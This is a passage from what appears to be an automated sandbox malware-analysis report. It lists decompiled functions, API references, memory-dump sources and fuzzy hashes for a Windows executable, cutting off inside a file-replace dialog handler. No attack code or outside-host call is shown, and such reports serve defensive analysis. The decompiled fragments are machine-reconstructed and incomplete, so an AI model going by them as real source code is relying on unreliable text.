				E003EE85D(0x40c68c, 0x433178); // executed
				goto __eax;
			}



                0x003ee580
                0x003ee587

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE580
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 2c925181acf6ac725c5b1c98f7f153afb86c2c2bb4ff48a09c9521e2b6fb2d09
                • Instruction ID: cc4eb472867a239c43e48bb3846533f2cfd03b51e88d661715a2f36813517c6f
                • Opcode Fuzzy Hash: 2c925181acf6ac725c5b1c98f7f153afb86c2c2bb4ff48a09c9521e2b6fb2d09
                • Instruction Fuzzy Hash: D2B012C12581A0BC754553565C03D37011CC0C5F12730973FF814C54C0E9844C481439
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EE5A7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E003EE5A7() {

				E003EE85D(0x40c68c, 0x433174); // executed
				goto __eax;
			}



                0x003ee580
                0x003ee587

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE580
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 43d9909988dc870c24f5a3785db176d5df4e9acc3ae88420fc1b3e31ec8a3a4d
                • Instruction ID: 58b4479b795d0918f4c51408c47cbeff492a77adf869d50dee3631885db0d933
                • Opcode Fuzzy Hash: 43d9909988dc870c24f5a3785db176d5df4e9acc3ae88420fc1b3e31ec8a3a4d
                • Instruction Fuzzy Hash: 04B012C12580A0BC750553565D02D37011CC0C5F11730973FF814C54C0ED454D492439
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EE593 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E003EE593() {

				E003EE85D(0x40c68c, 0x433180); // executed
				goto __eax;
			}



                0x003ee580
                0x003ee587

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE580
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: f1eba4ba2592508376212829da45ef4cca0b50ef00906d5f9d465cc7bcdb708d
                • Instruction ID: cfc36e4a9fba9c3b4829167d94023bebfb71b0880d74506a76d92f86c36dbf05
                • Opcode Fuzzy Hash: f1eba4ba2592508376212829da45ef4cca0b50ef00906d5f9d465cc7bcdb708d
                • Instruction Fuzzy Hash: 2CB012C12581A0BD750553561C02D37010CC0C5F11730973FF814C94C0E9484C081439
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EE3EF Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE3FC
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 3121eb286f63117595bda6947c687150f6b8b4319a5f53b82455a479bcb568ac
                • Instruction ID: 67940e3db15765f60787610f1d5283f284af4f8639b5e5867faa93a0b0444c1a
                • Opcode Fuzzy Hash: 3121eb286f63117595bda6947c687150f6b8b4319a5f53b82455a479bcb568ac
                • Instruction Fuzzy Hash: CAA011EA2A80A2BCB02A22022C02C3B020CC0C0F203308B2EF820B88C0AC8008080832
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EE43C Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE3FC
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: b08a70eaea69c0e69ba92debdbf6d5f00713a15b361bdeadd2cb68bfc04aeb03
                • Instruction ID: 783fdad476792a57a2f46f9336efa0afeccadc77b2a9da2296af8c21ec304802
                • Opcode Fuzzy Hash: b08a70eaea69c0e69ba92debdbf6d5f00713a15b361bdeadd2cb68bfc04aeb03
                • Instruction Fuzzy Hash: 84A011EA2A80A2BCB02A22022C02C3B020CC0C0F203308B2EF822A88C0A88008080832
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EE432 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE3FC
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: ccad7929f9f966b90203d92fa17aa90757458f1e1c49de8c877a3946e406fe6c
                • Instruction ID: 783fdad476792a57a2f46f9336efa0afeccadc77b2a9da2296af8c21ec304802
                • Opcode Fuzzy Hash: ccad7929f9f966b90203d92fa17aa90757458f1e1c49de8c877a3946e406fe6c
                • Instruction Fuzzy Hash: 84A011EA2A80A2BCB02A22022C02C3B020CC0C0F203308B2EF822A88C0A88008080832
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EE414 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE3FC
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: b3ebeba2765c1eadf3d1367ad6a6ef825f477c6e29a15da5700e9cdf86d6b257
                • Instruction ID: 783fdad476792a57a2f46f9336efa0afeccadc77b2a9da2296af8c21ec304802
                • Opcode Fuzzy Hash: b3ebeba2765c1eadf3d1367ad6a6ef825f477c6e29a15da5700e9cdf86d6b257
                • Instruction Fuzzy Hash: 84A011EA2A80A2BCB02A22022C02C3B020CC0C0F203308B2EF822A88C0A88008080832
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EE40A Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE3FC
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: b81084a469affcec5c1a2e386a7c1446afc71120d2aa10fb35db262daab4be72
                • Instruction ID: 783fdad476792a57a2f46f9336efa0afeccadc77b2a9da2296af8c21ec304802
                • Opcode Fuzzy Hash: b81084a469affcec5c1a2e386a7c1446afc71120d2aa10fb35db262daab4be72
                • Instruction Fuzzy Hash: 84A011EA2A80A2BCB02A22022C02C3B020CC0C0F203308B2EF822A88C0A88008080832
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EE446 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE3FC
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 2bda142ed9036c04f4997d7e244e53e7da4a9d0b0b582986eaa189b71875f6a7
                • Instruction ID: 783fdad476792a57a2f46f9336efa0afeccadc77b2a9da2296af8c21ec304802
                • Opcode Fuzzy Hash: 2bda142ed9036c04f4997d7e244e53e7da4a9d0b0b582986eaa189b71875f6a7
                • Instruction Fuzzy Hash: 84A011EA2A80A2BCB02A22022C02C3B020CC0C0F203308B2EF822A88C0A88008080832
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EE573 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE580
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: a19699807e51da331a5ddfe5935b49ac4fb5f7c9a074fd2d3550cc7f09158562
                • Instruction ID: d49e34f419af52ad936b6ae3163985ae2c2e483c8641d6a1e2805b795064d36c
                • Opcode Fuzzy Hash: a19699807e51da331a5ddfe5935b49ac4fb5f7c9a074fd2d3550cc7f09158562
                • Instruction Fuzzy Hash: 64A011C22A80A0BCB00A23A22C02C3B020CC0C2F223308B2EF820A88C0A88008082830
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EE5A2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE580
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 6fb0eb7a128478915e000f0abfddc1dc66a9efc98e3c656470ce164be1da8117
                • Instruction ID: 2200e6e2311fa0b685929cd2dd8c723d6d67682226e8738de9c35bd1fa5be420
                • Opcode Fuzzy Hash: 6fb0eb7a128478915e000f0abfddc1dc66a9efc98e3c656470ce164be1da8117
                • Instruction Fuzzy Hash: 6FA011C22A80A2BCB00A23A22C02C3B020CC0C2F203308B2EF822888C0A88008082830
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EE58E Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE580
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 1870fa2287861b027800a0cf6fb181b307b1dd0f01c37e40f7a15a4d6bcd3157
                • Instruction ID: 2200e6e2311fa0b685929cd2dd8c723d6d67682226e8738de9c35bd1fa5be420
                • Opcode Fuzzy Hash: 1870fa2287861b027800a0cf6fb181b307b1dd0f01c37e40f7a15a4d6bcd3157
                • Instruction Fuzzy Hash: 6FA011C22A80A2BCB00A23A22C02C3B020CC0C2F203308B2EF822888C0A88008082830
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003D9F09 Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON
                Download Yara Rule
                C-Code - Quality: 58%
                			E003D9F09(void* __ecx) {
				int _t2;

				_t2 = SetEndOfFile( *(__ecx + 8)); // executed
				asm("sbb al, al");
				return  ~(_t2 - 1) + 1;
			}




                0x003d9f0c
                0x003d9f15
                0x003d9f19

                APIs
                • SetEndOfFile.KERNELBASE(?,003D903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 003D9F0C
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: File
                • String ID:
                • API String ID: 749574446-0
                • Opcode ID: d4b331cc0c1bbdf5f7f03888f749857b97e5b09210dd64dd5f98b8a6ca9ba3fa
                • Instruction ID: 784228f315b7b0154c9e5d020a296f20e182772ce46ac43ecad42653612848c3
                • Opcode Fuzzy Hash: d4b331cc0c1bbdf5f7f03888f749857b97e5b09210dd64dd5f98b8a6ca9ba3fa
                • Instruction Fuzzy Hash: CFA0113008000A8ACE002B30CA0800E3B20EB22BC230002A8A00ACA0A2CB22880B8A00
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EAC04 Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E003EAC04(WCHAR* _a4) {
				signed int _t4;

				_t4 = SetCurrentDirectoryW(_a4); // executed
				return _t4 & 0xffffff00 | _t4 != 0x00000000;
			}




                0x003eac08
                0x003eac13

                APIs
                • SetCurrentDirectoryW.KERNELBASE(?,003EAE72,C:\Users\user\Desktop,00000000,0041946A,00000006), ref: 003EAC08
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: CurrentDirectory
                • String ID:
                • API String ID: 1611563598-0
                • Opcode ID: ee6d355ffda9211a9c5be4b4827f124ddbeaac5aa56aec7ed672e50b6279a943
                • Instruction ID: 31c08101c8af87142b8001b3e26932ed196065616d10c4e22563c40f38dced06
                • Opcode Fuzzy Hash: ee6d355ffda9211a9c5be4b4827f124ddbeaac5aa56aec7ed672e50b6279a943
                • Instruction Fuzzy Hash: 71A011302002008BC2000F328F0AA0EBAAAAFA2B02F00C038A080A8030CB30C820AA08
                Uniqueness

                Uniqueness Score: -1.00%

                Non-executed Functions

                Function 003EC220 Relevance: 51.0, APIs: 25, Strings: 4, Instructions: 286timewindowfileCOMMON
                Download Yara Rule
                C-Code - Quality: 70%
                			E003EC220(void* __ecx, void* __edx, void* __eflags, char _a4, short _a8, char _a12, short _a108, short _a112, char _a192, char _a212, struct _WIN32_FIND_DATAW _a288, signed char _a304, signed char _a308, struct _FILETIME _a332, intOrPtr _a340, intOrPtr _a344, short _a884, short _a896, short _a900, int _a1904, char _a1924, int _a1928, short _a2596, short _a2616, char _a2628, char _a2640, struct HWND__* _a6740, intOrPtr _a6744, signed short _a6748, intOrPtr _a6752) {
				struct _FILETIME _v0;
				struct _SYSTEMTIME _v12;
				struct _SYSTEMTIME _v16;
				struct _FILETIME _v24;
				void* _t74;
				void* _t137;
				long _t138;
				void* _t142;
				void* _t143;
				void* _t144;
				void* _t145;
				void* _t146;
				signed short _t148;
				void* _t149;
				void* _t150;
				intOrPtr _t152;
				signed int _t153;
				signed int _t157;
				struct HWND__* _t158;
				intOrPtr _t159;
				void* _t160;
				int _t162;
				int _t165;
				void* _t168;
				void* _t170;

				_t156 = __edx;
				E003EEC50(0x1a50);
				_t148 = _a6748;
				_t159 = _a6744;
				_t158 = _a6740;
				if(E003D1316(__edx, _t158, _t159, _t148, _a6752, L"REPLACEFILEDLG", 0, 0) == 0) {
					_t160 = _t159 - 0x110;
					if(_t160 == 0) {
						SetFocus(GetDlgItem(_t158, 0x6c));
						E003E0602( &_a2640, _a6752, 0x800);
						E003DC36E( &_a2628,  &_a2628, 0x800);
						SetDlgItemTextW(_t158, 0x65,  &_a2616);
						 *0x433074( &_a2616, 0,  &_a1924, 0x2b4, 0x100);
						SendDlgItemMessageW(_t158, 0x66, 0x170, _a1904, 0);
						_t149 = FindFirstFileW( &_a2596,  &_a288);
						if(_t149 != 0xffffffff) {
							FileTimeToLocalFileTime( &_a332,  &(_v24.dwHighDateTime));
							FileTimeToSystemTime( &(_v24.dwHighDateTime),  &_v12);
							_push(0x32);
							_push( &_a12);
							_push(0);
							_push( &_v12);
							_t162 = 2;
							GetTimeFormatW(0x400, 0x800, ??, ??, ??, ??);
							GetDateFormatW(0x400, 0,  &_v12, 0,  &_a112, 0x32);
							_push( &_a12);
							_push( &_a112);
							E003D4092( &_a900, 0x200, L"%s %s %s", E003DE617(0x99));
							_t170 = _t168 + 0x18;
							SetDlgItemTextW(_t158, 0x6a,  &_a900);
							FindClose(_t149);
							if((_a308 & 0x00000010) != 0) {
								_t150 = 0x200;
							} else {
								asm("adc eax, ebp");
								E003EAF0F(0 + _a344, _a340,  &_a212, 0x32);
								_push(E003DE617(0x98));
								_t150 = 0x200;
								E003D4092( &_a884, 0x200, L"%s %s",  &_a192);
								_t170 = _t170 + 0x14;
								SetDlgItemTextW(_t158, 0x68,  &_a884);
							}
